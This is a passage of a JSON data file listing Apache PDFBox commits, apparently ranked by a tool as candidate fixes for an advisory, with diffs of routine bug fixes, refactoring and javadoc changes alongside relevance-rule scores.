PDAbstractContentStream implement", - "- /**", - "- * q operator. Saves the current graphics state.", - "- * @throws IOException If an error occurs while writing to the stream.", - "- */", - "- @Override", - "- public void saveGraphicsState() throws IOException", - "- {", - "- if (!fontStack.isEmpty())", - "- {", - "- fontStack.push(fontStack.peek());", - "- }", - "- if (!strokingColorSpaceStack.isEmpty())", - "- {", - "- strokingColorSpaceStack.push(strokingColorSpaceStack.peek());", - "- }", - "- if (!nonStrokingColorSpaceStack.isEmpty())", - "- {", - "- nonStrokingColorSpaceStack.push(nonStrokingColorSpaceStack.peek());", - "- }", - "- writeOperator(\"q\");", - "- }", - "-", - "- /**", - "- * Q operator. Restores the current graphics state.", - "- * @throws IOException If an error occurs while writing to the stream.", - "- */", - "- @Override", - "- public void restoreGraphicsState() throws IOException", - "- {", - "- if (!fontStack.isEmpty())", - "- {", - "- fontStack.pop();", - "- }", - "- if (!strokingColorSpaceStack.isEmpty())", - "- {", - "- strokingColorSpaceStack.pop();", - "- }", - "- if (!nonStrokingColorSpaceStack.isEmpty())", - "- {", - "- nonStrokingColorSpaceStack.pop();", - "- }", - "- writeOperator(\"Q\");", - "- }", - "-", - " /**", - "@@ -1149,98 +977,2 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " }", - "- ", - "- /**", - "- * Set an extended graphics state.", - "- * ", - "- * @param state The extended graphics state.", - "- * @throws IOException If the content stream could not be written.", - "- */", - "- @Override", - "- public void setGraphicsStateParameters(PDExtendedGraphicsState state) throws IOException", - "- {", - "- writeOperand(resources.add(state));", - "- writeOperator(\"gs\");", - "- }", - "-", - "- /**", - "- * Set the text rendering mode. This determines whether showing text shall cause glyph outlines", - "- * to be stroked, filled, used as a clipping boundary, or some combination of the three.", - "- *", - "- * @param rm The text rendering mode.", - "- * @throws IOException If the content stream could not be written.", - "- */", - "- public void setRenderingMode(RenderingMode rm) throws IOException", - "- {", - "- writeOperand(rm.intValue());", - "- writeOperator(\"Tr\");", - "- }", - "-", - "- /**", - "- * Set the text rise value, i.e. move the baseline up or down. This is useful for drawing", - "- * superscripts or subscripts.", - "- *", - "- * @param rise Specifies the distance, in unscaled text space units, to move the baseline up or", - "- * down from its default location. 0 restores the default location.", - "- * @throws IOException", - "- */", - "- public void setTextRise(float rise) throws IOException", - "- {", - "- writeOperand(rise);", - "- writeOperator(\"Ts\");", - "- }", - "-", - "- private byte[] encodeForGsub(GsubWorker gsubWorker,", - "- Set glyphIds, PDType0Font font, String text) throws IOException", - "- {", - "-", - "- String spaceRegexPattern = \"\\\\s\";", - "- Pattern spaceRegex = Pattern.compile(spaceRegexPattern);", - "-", - "- // break the entire chunk of text into words by splitting it with space", - "- List words = new CompoundCharacterTokenizer(\"\\\\s\").tokenize(text);", - "-", - "- ByteArrayOutputStream out = new ByteArrayOutputStream();", - "-", - "- for (String word : words)", - "- {", - "- if (spaceRegex.matcher(word).matches())", - "- {", - "- out.write(font.encode(word));", - "- }", - "- else", - "- {", - "- glyphIds.addAll(applyGSUBRules(gsubWorker, out, font, word));", - "- }", - "- }", - "-", - "- return out.toByteArray();", - "- }", - "-", - "- private List applyGSUBRules(GsubWorker gsubWorker, ByteArrayOutputStream out, PDType0Font font, String word) throws IOException", - "- {", - "- List originalGlyphIds = new ArrayList<>();", - "- CmapLookup cmapLookup = font.getCmapLookup();", - "-", - "- // convert characters into glyphIds", - "- for (char unicodeChar : word.toCharArray())", - "- {", - "- int glyphId = cmapLookup.getGlyphId(unicodeChar);", - "- if (glyphId <= 0)", - "- {", - "- throw new IllegalStateException(", - "- \"could not find the glyphId for the character: \" + unicodeChar);", - "- }", - "- originalGlyphIds.add(glyphId);", - "- }", - "-", - "- List glyphIdsAfterGsub = gsubWorker.applyTransforms(originalGlyphIds);", - "-", - "- for (Integer glyphId : glyphIdsAfterGsub)", - "- {", - "- out.write(font.encodeGlyphId(glyphId));", - "- }", - "-", - "- return glyphIdsAfterGsub;", - "-", - "- }", - "-", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPatternContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPatternContentStream.java", - "index 64bd45acb..c4a6bf88e 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPatternContentStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPatternContentStream.java", - "@@ -36,3 +36,3 @@ public final class PDPatternContentStream extends PDAbstractContentStream", - " {", - "- super(pattern.getContentStream().createOutputStream(), pattern.getResources());", - "+ super(null, pattern.getContentStream().createOutputStream(), pattern.getResources());", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDFormContentStream.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPatternContentStream.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4068": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: page", - "relevance": 4 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4068", - "relevance": 2 - } - ] - }, - { - "commit_id": "a5449d6fea0d20302643cd6035e0479ed1b35b60", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1531154230, - "hunks": 1, - "message": "PDFBOX-4261: copy xref table entries to make sure that object numbers are kept when saving incrementally git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/1.8@1835454 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/NonSequentialPDFParser.java b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/NonSequentialPDFParser.java", - "index dab6b2f43..364edcfee 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/NonSequentialPDFParser.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/NonSequentialPDFParser.java", - "@@ -646,2 +646,4 @@ public class NonSequentialPDFParser extends PDFParser", - " checkXrefOffsets();", - "+ // copy xref table", - "+ document.addXRefTable(xrefTrailerResolver.getXrefTable());", - " return trailer;" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdfparser/NonSequentialPDFParser.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4261": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "1.8.16", - "1.8.17" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: parse", - "relevance": 4 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4261", - "relevance": 2 - } - ] - }, - { - "commit_id": "44459e8b94c95211ffb3ada07b31be032ce2c7f8", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523708898, - "hunks": 1, - "message": "PDFBOX-3809: add missing test for hasMissingPageRef before LOG statement git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829135 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", - "index e715bb9a4..5d47308fa 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", - "@@ -805,3 +805,6 @@ public final class PDAcroForm implements COSObjectable", - " // widget. But this will be much slower so will be omitted for now.", - "- LOG.warn(\"There has been a widget with a missing page reference. Please report to the PDFBox project\");", - "+ if (hasMissingPageRef)", - "+ {", - "+ LOG.warn(\"There has been a widget with a missing page reference. Please report to the PDFBox project\");", - "+ }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3809": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: page", - "relevance": 4 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3809", - "relevance": 2 - } - ] - }, - { - "commit_id": "a5ead97b122eaba8cbcaab15d71b990691b1c21a", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523727830, - "hunks": 1, - "message": "PDFBOX-4182, PDFBOX-4188: correct javadoc git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829159 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "index 0ce2de7b5..ecf046e87 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "@@ -102,5 +102,5 @@ public class PDFMergerUtility", - " * ", - "- *

  • {@link DocumentMergeMode#PDFBOX_LEGACY_MODE} fields with the same fully qualified name", - "- * will be renamed and treated as independent. This mode was used in versions", - "- * of PDFBox up to 2.x.", - "+ *
  • {@link DocumentMergeMode#PDFBOX_LEGACY_MODE} Keeps all files open until the", - "+ * merge has been completed. This is currently necessary to merge documents", - "+ * containing a Structure Tree.
    This is the standard mode for PDFBox 2.0.", - " * " - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4182": "", - "PDFBOX-4188": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "5c3cf8f2edd00f49ff3a261a42b8633fdaa786dd" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4182, PDFBOX-4188", - "relevance": 2 - } - ] - }, - { - "commit_id": "6563576aabf4cee1628889b23d7bb9f70a5be844", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1532535998, - "hunks": 8, - "message": "PDFBOX-4071: avoid ClassCastException git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836646 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java", - "index 5fc9bbce1..78faf5a0d 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java", - "@@ -115,4 +115,4 @@ public class PDType3Font extends PDSimpleFont", - " {", - "- COSStream stream = (COSStream) getCharProcs().getDictionaryObject(COSName.getPDFName(name));", - "- return stream != null;", - "+ COSBase base = getCharProcs().getDictionaryObject(COSName.getPDFName(name));", - "+ return base instanceof COSStream;", - " }", - "@@ -226,6 +226,6 @@ public class PDType3Font extends PDSimpleFont", - " {", - "- COSArray array = (COSArray) dict.getDictionaryObject(COSName.FONT_MATRIX);", - "- if (array != null)", - "+ COSBase base = dict.getDictionaryObject(COSName.FONT_MATRIX);", - "+ if (base instanceof COSArray)", - " {", - "- fontMatrix = new Matrix(array);", - "+ fontMatrix = new Matrix((COSArray) base);", - " }", - "@@ -255,6 +255,6 @@ public class PDType3Font extends PDSimpleFont", - " {", - "- COSDictionary resourcesDict = (COSDictionary) dict.getDictionaryObject(COSName.RESOURCES);", - "- if (resourcesDict != null)", - "+ COSBase base = dict.getDictionaryObject(COSName.RESOURCES);", - "+ if (base instanceof COSDictionary)", - " {", - "- this.resources = new PDResources(resourcesDict);", - "+ this.resources = new PDResources((COSDictionary) base);", - " }", - "@@ -271,7 +271,7 @@ public class PDType3Font extends PDSimpleFont", - " {", - "- COSArray rect = (COSArray) dict.getDictionaryObject(COSName.FONT_BBOX);", - "+ COSBase base = dict.getDictionaryObject(COSName.FONT_BBOX);", - " PDRectangle retval = null;", - "- if(rect != null)", - "+ if (base instanceof COSArray)", - " {", - "- retval = new PDRectangle(rect);", - "+ retval = new PDRectangle((COSArray) base);", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "f65839e45cf27ff0c178cdf4398c5b39dd1c4102" - ] - ], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "ffb9596746b636b7f85429fd7b9b06df653fa606", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524159762, - "hunks": 1, - "message": "PDFBOX-4071: add comment git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829580 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "index 616d7b845..a431e858a 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "@@ -721,2 +721,4 @@ public class PDFMergerUtility", - " {", - "+ // add the value of the destination ParentTreeNextKey to every source element ", - "+ // StructParent(s) value so that these don't overlap with the existing values", - " updateStructParentEntries(newPage, destParentTreeNextKey);" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "16591de35c096b22bb9cada8509f460ef2c0ce21" - ], - [ - "no-tag", - "7a398b4319d294c1ffa7105f50680e98be6604a0" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "679b076473675cd697124c16b1936e42324ae127", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527790046, - "hunks": 1, - "message": "PDFBOX-4235: avoid NPE if font is not defined in /DA string git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832635 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", - "index 03218edb2..1c40f70c5 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", - "@@ -413,3 +413,6 @@ class AppearanceGeneratorHelper", - " PDFont font = defaultAppearance.getFont();", - "- ", - "+ if (font == null)", - "+ {", - "+ throw new IllegalStateException(\"font is null, check whether /DA entry is incomplete or incorrect\");", - "+ }", - " // calculate the fontSize (because 0 = autosize)" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4235": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "86569de9c42a2589927280c7fca684e5c946779b" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4235", - "relevance": 2 - } - ] - }, - { - "commit_id": "0cd3397d9332026f633e9f859c467270f98e0446", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523727211, - "hunks": 2, - "message": "PDFBOX-4182, PDFBOX-4188: add new merge mode which closes the source PDDocument after the individual merge; early implementation git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829156 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "index e418daa6e..0ce2de7b5 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "@@ -90,2 +90,25 @@ public class PDFMergerUtility", - "+ private DocumentMergeMode documentMergeMode = DocumentMergeMode.PDFBOX_LEGACY_MODE;", - "+", - "+ /**", - "+ * The mode to use when merging documents.", - "+ * ", - "+ *

      ", - "+ *
    • {@link DocumentMergeMode#OPTIMIZE_RESOURCES_MODE} Optimizes resource handling such as", - "+ * closing documents early. Not all document elements are merged compared to", - "+ * the PDFBOX_LEGACY_MODE. Currently supported are:", - "+ *
        ", - "+ *
      • Page content and resources", - "+ *
      ", - "+ *
    • {@link DocumentMergeMode#PDFBOX_LEGACY_MODE} fields with the same fully qualified name", - "+ * will be renamed and treated as independent. This mode was used in versions", - "+ * of PDFBox up to 2.x.", - "+ *
    ", - "+ */", - "+ public enum DocumentMergeMode", - "+ {", - "+ OPTIMIZE_RESOURCES_MODE,", - "+ PDFBOX_LEGACY_MODE", - "+ }", - "+", - " /**", - "@@ -252,2 +275,80 @@ public class PDFMergerUtility", - " public void mergeDocuments(MemoryUsageSetting memUsageSetting) throws IOException", - "+ {", - "+ if (documentMergeMode == DocumentMergeMode.PDFBOX_LEGACY_MODE)", - "+ {", - "+ legacyMergeDocuments(memUsageSetting);", - "+ }", - "+ else if (documentMergeMode == DocumentMergeMode.OPTIMIZE_RESOURCES_MODE)", - "+ {", - "+ optimizedMergeDocuments(memUsageSetting, sources);", - "+ }", - "+ }", - "+", - "+ private void optimizedMergeDocuments(MemoryUsageSetting memUsageSetting, List sourceDocuments) throws IOException", - "+ {", - "+ PDDocument destination = null;", - "+ try", - "+ {", - "+ destination = new PDDocument(memUsageSetting);", - "+ PDFCloneUtility cloner = new PDFCloneUtility(destination);", - "+", - "+ for (InputStream sourceInputStream : sources)", - "+ {", - "+ PDDocument sourceDoc = null;", - "+ try", - "+ {", - "+ sourceDoc = PDDocument.load(sourceInputStream, memUsageSetting);", - "+", - "+ for (PDPage page : sourceDoc.getPages())", - "+ {", - "+ PDPage newPage = new PDPage((COSDictionary) cloner.cloneForNewDocument(page.getCOSObject()));", - "+ newPage.setCropBox(page.getCropBox());", - "+ newPage.setMediaBox(page.getMediaBox());", - "+ newPage.setRotation(page.getRotation());", - "+ PDResources resources = page.getResources();", - "+ if (resources != null)", - "+ {", - "+ // this is smart enough to just create references for resources that are used on multiple pages", - "+ newPage.setResources(new PDResources((COSDictionary) cloner.cloneForNewDocument(resources)));", - "+ }", - "+ else", - "+ {", - "+ newPage.setResources(new PDResources());", - "+ }", - "+ destination.addPage(newPage);", - "+ }", - "+ sourceDoc.close();", - "+ }", - "+ finally", - "+ {", - "+ IOUtils.closeQuietly(sourceDoc);", - "+ }", - "+ sourceInputStream.close();", - "+ }", - "+ ", - "+ if (destinationStream == null)", - "+ {", - "+ destination.save(destinationFileName);", - "+ }", - "+ else", - "+ {", - "+ destination.save(destinationStream);", - "+ }", - "+ }", - "+ finally", - "+ {", - "+ IOUtils.closeQuietly(destination);", - "+ }", - "+ }", - "+", - "+ /**", - "+ * Merge the list of source documents, saving the result in the destination", - "+ * file.", - "+ *", - "+ * @param memUsageSetting defines how memory is used for buffering PDF streams;", - "+ * in case of null unrestricted main memory is used ", - "+ * ", - "+ * @throws IOException If there is an error saving the document.", - "+ */", - "+ private void legacyMergeDocuments(MemoryUsageSetting memUsageSetting) throws IOException", - " {" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4182": "", - "PDFBOX-4188": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "9045df5f353972cbddca45c0d7cd15f25cc28c19" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4182, PDFBOX-4188", - "relevance": 2 - } - ] - }, - { - "commit_id": "18a5850ec8daa7a46b196d462100abcb39425932", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529946072, - "hunks": 1, - "message": "PDFBOX-4071: remove command that doesn't exist in 2.* from \"usage\" message git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834346 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/tools/src/main/java/org/apache/pdfbox/tools/PDFBox.java b/tools/src/main/java/org/apache/pdfbox/tools/PDFBox.java", - "index 472419e69..1ef727a4f 100644", - "--- a/tools/src/main/java/org/apache/pdfbox/tools/PDFBox.java", - "+++ b/tools/src/main/java/org/apache/pdfbox/tools/PDFBox.java", - "@@ -109,3 +109,2 @@ public final class PDFBox", - " + \"\\nPossible commands are:\\n\"", - "- + \" ConvertColorspace\\n\"", - " + \" Decrypt\\n\"" - ], - "changed_files": [ - "tools/src/main/java/org/apache/pdfbox/tools/PDFBox.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "4cfd06ef1c1493b9c69239d86e02b1a7e839aec6" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "ec2e25303facbc19557decd92ddc225424b6062f", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530812177, - "hunks": 2, - "message": "PDFBOX-4242: better method name git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1835162 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", - "index 6dd79df70..ec21bee87 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", - "@@ -906,3 +906,3 @@ public class PDDocument implements Closeable", - " */", - "- public void registerTrueTypeFont(TrueTypeFont ttf)", - "+ public void registerTrueTypeFontForClosing(TrueTypeFont ttf)", - " {", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "index f2e225997..4b8f756ad 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "@@ -224,3 +224,3 @@ public class PDType0Font extends PDFont implements PDVectorFont", - " this.ttf = ttf;", - "- document.registerTrueTypeFont(ttf);", - "+ document.registerTrueTypeFontForClosing(ttf);", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4242": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "47de78239855498beea5333498481e0dad6f41d7" - ] - ], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4242", - "relevance": 2 - } - ] - }, - { - "commit_id": "4c77ee8b4e51a4182915b57f0c67d372bf1cb109", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523387368, - "hunks": 19, - "message": "PDFBOX-4187: refactor, use the alpha value from getRGB() git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1828848 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "index 9cd871872..06f1e7582 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "+++ 